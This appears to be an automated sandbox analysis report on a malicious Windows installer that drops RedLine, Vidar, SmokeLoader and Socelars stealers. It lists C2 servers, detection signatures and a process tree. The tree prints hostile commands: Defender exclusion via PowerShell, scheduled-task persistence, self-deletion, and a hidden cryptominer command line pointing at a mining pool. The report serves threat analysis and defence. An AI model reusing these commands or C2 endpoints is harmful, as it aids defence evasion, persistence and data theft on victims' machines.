Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

23-09-2021 21:08

210923-zyzyaafbfr 10

22-09-2021 10:40

210922-mqyzssehck 10

22-09-2021 05:21

210922-f114ksecck 10

21-09-2021 05:29

210921-f6zspsgdg2 10

20-09-2021 21:51

210920-1qj3jafed9 10

20-09-2021 19:44

210920-yftswafca9 10

20-09-2021 08:28

210920-kczcasgahr 10

20-09-2021 04:42

210920-fb3acafedj 10

20-09-2021 04:42

210920-fb2zksfecr 10

Analysis

  • max time kernel
    63s
  • max time network
    1806s
  • platform
    windows7_x64
  • resource
    win7-de-20210920
  • submitted
    22-09-2021 10:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.0MB

  • MD5

    73491325fde5366b31c09da701d07dd6

  • SHA1

    a4e1ada57e590c2df30fc26fad5f3ca57ad922b1

  • SHA256

    56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

  • SHA512

    28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Score
10/10
redlinesmokeloadersocelarsvidar706janesamaspackv2backdoorevasioninfostealerspywarestealersuricatathemidatrojan

Malware Config

Extracted

Family

redline

Botnet

janesam

C2

65.108.20.195:6774

Extracted

Family

vidar

Version

40.7

Botnet

706

C2

https://petrenko96.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/
rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Downloads MZ/PE file
  • Executes dropped EXE 15 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 54 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:740
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
            PID:1608
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1688
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
            4⤵
            • Loads dropped DLL
            PID:992
            • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun1917b8fb5f09db8.exe
              Sun1917b8fb5f09db8.exe
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              PID:2036
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 1340
                6⤵
                • Program crash
                PID:2720
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
            4⤵
              PID:816
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
              4⤵
              • Loads dropped DLL
              PID:1816
              • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun193fda712d9f1.exe
                Sun193fda712d9f1.exe
                5⤵
                • Executes dropped EXE
                PID:268
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
              4⤵
              • Loads dropped DLL
              PID:1716
              • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun19e4ade31b2a.exe
                Sun19e4ade31b2a.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1656
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
              4⤵
              • Loads dropped DLL
              PID:2012
              • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun1908b94df837b3158.exe
                Sun1908b94df837b3158.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:308
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
              4⤵
              • Loads dropped DLL
              PID:1916
              • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun19de8ff4b6aefeb8.exe
                Sun19de8ff4b6aefeb8.exe /mixone
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies system certificate store
                PID:1580
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\23650954139.exe"
                  6⤵
                    PID:1160
                    • C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\23650954139.exe
                      "C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\23650954139.exe"
                      7⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Loads dropped DLL
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1028
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\61772882773.exe" /mix
                    6⤵
                      PID:2116
                      • C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\61772882773.exe
                        "C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\61772882773.exe" /mix
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:2172
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\pfgiBpqqRCC & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\61772882773.exe"
                          8⤵
                            PID:2368
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout 4
                              9⤵
                              • Delays execution with timeout.exe
                              PID:2608
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\76050513516.exe" /mix
                        6⤵
                        • Loads dropped DLL
                        PID:2192
                        • C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\76050513516.exe
                          "C:\Users\Admin\AppData\Local\Temp\{AYtE-AZwRu-gZm6-d1COY}\76050513516.exe" /mix
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2260
                          • C:\Users\Admin\AppData\Roaming\sliders\apinesp.exe
                            apinesp.exe
                            8⤵
                            • Loads dropped DLL
                            PID:1160
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
                        6⤵
                        • Loads dropped DLL
                        PID:2380
                        • C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
                          "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2588
                          • C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
                            "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
                            8⤵
                              PID:3000
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun19de8ff4b6aefeb8.exe" & exit
                          6⤵
                            PID:2476
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im "Sun19de8ff4b6aefeb8.exe" /f
                              7⤵
                              • Kills process with taskkill
                              PID:2636
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im "setup.exe" /f
                                8⤵
                                • Kills process with taskkill
                                PID:2756
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
                        4⤵
                        • Loads dropped DLL
                        PID:1400
                        • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun19eb40faaaa9.exe
                          Sun19eb40faaaa9.exe
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:1748
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 936
                            6⤵
                            • Loads dropped DLL
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2520
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
                        4⤵
                          PID:1556
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
                          4⤵
                          • Loads dropped DLL
                          PID:684
                          • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun195a1614ec24e6a.exe
                            Sun195a1614ec24e6a.exe
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1060
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
                          4⤵
                          • Loads dropped DLL
                          PID:1844
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
                          4⤵
                          • Loads dropped DLL
                          PID:1804
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
                          4⤵
                            PID:1096
                            • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun191101c1aaa.exe
                              Sun191101c1aaa.exe
                              5⤵
                                PID:2792
                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                  6⤵
                                    PID:2272
                                    • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                      7⤵
                                        PID:952
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                          8⤵
                                          • Loads dropped DLL
                                          PID:2116
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                            9⤵
                                            • Creates scheduled task(s)
                                            PID:2832
                                        • C:\Users\Admin\AppData\Roaming\services64.exe
                                          "C:\Users\Admin\AppData\Roaming\services64.exe"
                                          8⤵
                                            PID:1880
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                              9⤵
                                                PID:3064
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                  10⤵
                                                  • Creates scheduled task(s)
                                                  PID:1680
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                9⤵
                                                  PID:2660
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                  9⤵
                                                    PID:972
                                              • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                7⤵
                                                  PID:2400
                                                • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                  7⤵
                                                    PID:1484
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 1484 -s 1432
                                                      8⤵
                                                      • Program crash
                                                      PID:2140
                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                    7⤵
                                                      PID:1872
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                                        8⤵
                                                          PID:2636
                                                      • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                        7⤵
                                                          PID:2572
                                                        • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                          7⤵
                                                            PID:1868
                                                            • C:\Windows\system32\WerFault.exe
                                                              C:\Windows\system32\WerFault.exe -u -p 1868 -s 1432
                                                              8⤵
                                                              • Program crash
                                                              PID:2844
                                                          • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
                                                            7⤵
                                                              PID:2416
                                                            • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                              7⤵
                                                                PID:820
                                                                • C:\Users\Admin\AppData\Local\Temp\is-R9D2L.tmp\setup_2.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-R9D2L.tmp\setup_2.tmp" /SL5="$302BA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                  8⤵
                                                                    PID:1480
                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                      9⤵
                                                                        PID:2372
                                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                    7⤵
                                                                      PID:2676
                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                        8⤵
                                                                          PID:940
                                                                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                        7⤵
                                                                          PID:2124
                                                                        • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                          7⤵
                                                                            PID:2592
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun198361825f4.exe
                                                                Sun198361825f4.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:436
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0D64B5F2\Sun1966fb31dd5a07.exe
                                                                Sun1966fb31dd5a07.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:1320
                                                              • C:\Users\Admin\AppData\Local\Temp\BF1.exe
                                                                C:\Users\Admin\AppData\Local\Temp\BF1.exe
                                                                1⤵
                                                                  PID:2228
                                                                • C:\Users\Admin\AppData\Local\Temp\588C.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\588C.exe
                                                                  1⤵
                                                                    PID:2632
                                                                  • C:\Users\Admin\AppData\Local\Temp\A4C8.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\A4C8.exe
                                                                    1⤵
                                                                      PID:2480
                                                                    • C:\Users\Admin\AppData\Local\Temp\FAD5.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\FAD5.exe
                                                                      1⤵
                                                                        PID:2052
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im FAD5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FAD5.exe" & del C:\ProgramData\*.dll & exit
                                                                          2⤵
                                                                            PID:3040
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im FAD5.exe /f
                                                                              3⤵
                                                                              • Kills process with taskkill
                                                                              PID:1316
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              3⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:1864
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-C4SOB.tmp\setup_2.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-C4SOB.tmp\setup_2.tmp" /SL5="$202C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                          1⤵
                                                                            PID:2964
                                                                          • C:\Windows\system32\rundll32.exe
                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                            1⤵
                                                                            • Process spawned unexpected child process
                                                                            PID:2440
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                              2⤵
                                                                                PID:1768
                                                                            • C:\Windows\system32\taskeng.exe
                                                                              taskeng.exe {52157865-5308-46AC-9D2E-CED70EF5F680} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                              1⤵
                                                                                PID:1700
                                                                                • C:\Users\Admin\AppData\Roaming\drtdauw
                                                                                  C:\Users\Admin\AppData\Roaming\drtdauw
                                                                                  2⤵
                                                                                    PID:1380
                                                                                  • C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                                                                                    "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
                                                                                    2⤵
                                                                                      PID:2104
                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                    taskeng.exe {0B8A62E8-E85F-4BE5-9089-65DC0BB8D296} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                    1⤵
                                                                                      PID:760

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v6

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • memory/308-302-0x0000000000400000-0x000000000044D000-memory.dmp

                                                                                      Filesize

                                                                                      308KB

                                                                                      Download

                                                                                    • memory/308-300-0x00000000003B0000-0x00000000003FD000-memory.dmp

                                                                                      Filesize

                                                                                      308KB

                                                                                      Download

                                                                                    • memory/436-184-0x00000000004C0000-0x00000000004CB000-memory.dmp

                                                                                      Filesize

                                                                                      44KB

                                                                                      Download

                                                                                    • memory/436-308-0x000000001B020000-0x000000001B022000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                      Download

                                                                                    • memory/436-343-0x000000001B026000-0x000000001B045000-memory.dmp

                                                                                      Filesize

                                                                                      124KB

                                                                                      Download

                                                                                    • memory/436-179-0x0000000000050000-0x0000000000051000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/740-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                      Download

                                                                                    • memory/740-124-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                      Download

                                                                                    • memory/740-111-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                      Download

                                                                                    • memory/740-113-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                      Download

                                                                                    • memory/740-120-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                      Filesize

                                                                                      572KB

                                                                                      Download

                                                                                    • memory/740-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                      Filesize

                                                                                      152KB

                                                                                      Download

                                                                                    • memory/740-103-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                      Download

                                                                                    • memory/740-107-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                      Download

                                                                                    • memory/740-83-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                      Filesize

                                                                                      572KB

                                                                                      Download

                                                                                    • memory/740-126-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                      Filesize

                                                                                      152KB

                                                                                      Download

                                                                                    • memory/820-349-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                      Filesize

                                                                                      80KB

                                                                                      Download

                                                                                    • memory/956-54-0x0000000076391000-0x0000000076393000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                      Download

                                                                                    • memory/1028-190-0x0000000000020000-0x0000000000021000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1028-312-0x0000000002720000-0x0000000002721000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1060-309-0x00000000051A0000-0x00000000051A1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1060-177-0x0000000001350000-0x0000000001351000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1060-199-0x0000000000A10000-0x0000000000A2D000-memory.dmp

                                                                                      Filesize

                                                                                      116KB

                                                                                      Download

                                                                                    • memory/1060-198-0x0000000000660000-0x0000000000683000-memory.dmp

                                                                                      Filesize

                                                                                      140KB

                                                                                      Download

                                                                                    • memory/1160-329-0x0000000000400000-0x00000000004D3000-memory.dmp

                                                                                      Filesize

                                                                                      844KB

                                                                                      Download

                                                                                    • memory/1160-333-0x0000000002544000-0x0000000002546000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                      Download

                                                                                    • memory/1160-330-0x0000000002541000-0x0000000002542000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1160-331-0x0000000002542000-0x0000000002543000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1160-332-0x0000000002543000-0x0000000002544000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1160-328-0x0000000000260000-0x0000000000290000-memory.dmp

                                                                                      Filesize

                                                                                      192KB

                                                                                      Download

                                                                                    • memory/1228-306-0x0000000002B80000-0x0000000002B95000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                      Download

                                                                                    • memory/1484-345-0x000000001B050000-0x000000001B052000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                      Download

                                                                                    • memory/1580-176-0x0000000000230000-0x0000000000296000-memory.dmp

                                                                                      Filesize

                                                                                      408KB

                                                                                      Download

                                                                                    • memory/1580-301-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                                      Filesize

                                                                                      408KB

                                                                                      Download

                                                                                    • memory/1656-311-0x000000001AD70000-0x000000001AD72000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                      Download

                                                                                    • memory/1656-183-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1656-181-0x0000000000C70000-0x0000000000C71000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1688-307-0x00000000002A1000-0x00000000002A2000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1688-310-0x00000000002A2000-0x00000000002A4000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                      Download

                                                                                    • memory/1688-303-0x00000000002A0000-0x00000000002A1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/1748-305-0x0000000000400000-0x00000000004D7000-memory.dmp

                                                                                      Filesize

                                                                                      860KB

                                                                                      Download

                                                                                    • memory/1748-304-0x0000000000AE0000-0x0000000000BB4000-memory.dmp

                                                                                      Filesize

                                                                                      848KB

                                                                                      Download

                                                                                    • memory/1872-347-0x0000000000340000-0x000000000036F000-memory.dmp

                                                                                      Filesize

                                                                                      188KB

                                                                                      Download

                                                                                    • memory/1872-348-0x0000000000400000-0x0000000000458000-memory.dmp

                                                                                      Filesize

                                                                                      352KB

                                                                                      Download

                                                                                    • memory/2036-313-0x0000000004390000-0x00000000044D0000-memory.dmp

                                                                                      Filesize

                                                                                      1.2MB

                                                                                      Download

                                                                                    • memory/2172-314-0x0000000000240000-0x0000000000286000-memory.dmp

                                                                                      Filesize

                                                                                      280KB

                                                                                      Download

